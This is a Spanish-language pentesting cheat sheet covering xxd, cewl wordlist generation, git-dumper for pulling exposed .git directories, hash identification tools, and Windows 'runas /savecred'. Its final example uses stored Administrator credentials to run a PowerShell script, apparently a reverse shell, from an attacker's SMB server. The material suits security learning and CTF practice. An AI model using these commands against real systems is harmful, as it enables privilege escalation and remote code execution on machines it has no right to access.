Cybersecurity Resource
El comando xxd es una herramienta en Linux que se utiliza para realizar operaciones con archivos en formato hexadecimal. Proporciona funcionalidades para convertir datos binarios en formato hexadecimal legible y viceversa. También puede realizar operaciones como revertir la conversión hexadecimal a binario y realizar cambios en los datos hexadecimales.
Convertir datos a Hexadecimal:
$cat ejemplo.txt | xxd
Revertir conversión Hexadecimal:
$cat ejemplo.txt | xxd -r
El comando cewl es una herramienta de generación de diccionarios en línea de comandos que se utiliza en entornos de pruebas de seguridad y análisis de vulnerabilidades. La palabra “cewl” es una abreviatura de “Custom Word List”.
La herramienta cewl se utiliza para generar listas de palabras personalizadas (diccionarios) a partir de un sitio web o texto de entrada. Escanea el contenido del sitio web o archivo de texto y extrae palabras clave relevantes para crear un diccionario específico para el objetivo en cuestión.
Crear diccionario con palabras que contengan números
$cewl -w diccionario.txt –with-numbers http://example.com
Crear diccionario con palabras sin números
$cewl -w diccionario.txt http://example.com
Una herramienta para volcar un repositorio git desde un sitio web.
link github https://github.com/arthaud/git-dumper
## Como funciona?
La herramienta primero verificará si la lista de directorios está disponible. Si es así, simplemente descargará recursivamente el directorio .git (lo que haría con `wget`).
Si la lista de directorios no está disponible, utilizará varios métodos para encontrar tantos archivos como sea posible. Paso a paso, git-dumper:
– Obtener todos los archivos comunes ( `.gitignore`, `.git/HEAD`, `.git/index`, etc.);
– Encuentre tantas referencias como sea posible (como `refs/heads/master`, `refs/remotes/origin/HEAD`, etc.) analizando `.git/HEAD`, `.git/logs/HEAD`, `.git/config`, `.git/packed-refs`etc.;
– Encuentre tantos objetos (sha1 ) como sea posible analizando `.git/packed-refs`, y `.git/index`;`.git/refs/*“.git/logs/*`
– Obtener todos los objetos de forma recursiva, analizando cada compromiso para encontrar a sus padres;
– Ejecutar `git checkout .`para recuperar el árbol de trabajo actual
Esta herramienta nos ayuda a traer todo el proyecto de la pagina web para después poder inspeccionar el proyecto.
$python3 git-dumper http://direccion_ip/dev/.git/
La herramienta hashid es útil cuando se obtiene un hash y se quiere determinar qué algoritmo se utilizó para generarlo. Al proporcionar el hash como entrada, hashid intenta identificar el algoritmo correspondiente y proporciona información sobre el tipo de hash y sus posibles variantes.
$hashid d41d8cd98f00b204e9800998ecf8427e
La herramienta hash-identifier es especialmente útil para los expertos en seguridad informática y administradores de sistemas, ya que les permite reconocer rápidamente el tipo de hash que están tratando, lo que puede ser relevante para tareas de resolución de problemas, auditorías de seguridad, recuperación de contraseñas, entre otros casos.
$hash-identifier d41d8cd98f00b204e9800998ecf8427e
Para saber mas visita el post https://steflan-security.com/windows-privilege-escalation-runas-stored-credentials/ explicado.
El comando “runas” es una utilidad que permite a los usuarios ejecutar programas con diferentes credenciales, es decir, con derechos y privilegios diferentes de los que tienen en su sesión actual. Esto es útil cuando se necesita ejecutar una aplicación con permisos elevados sin cerrar la sesión actual y sin cambiar permanentemente los privilegios del usuario.
Sintaxis:
runas /savecred /user:WORKGROUP\User “Program to execute”
Ejemplo:
runas /savecred /user:ACCESS\Administrator “powershell -exec bypass -nop -File \\10.10.10.10\smb\Ipshell.ps1”
IMPORTANTE. Recordar que para ejecutar este parámetro como se muestra en el ejemplo solicitando el script Ipshell.ps1, ya tiene que estar configurado y almacenado en un servidor falso montado por el atacante.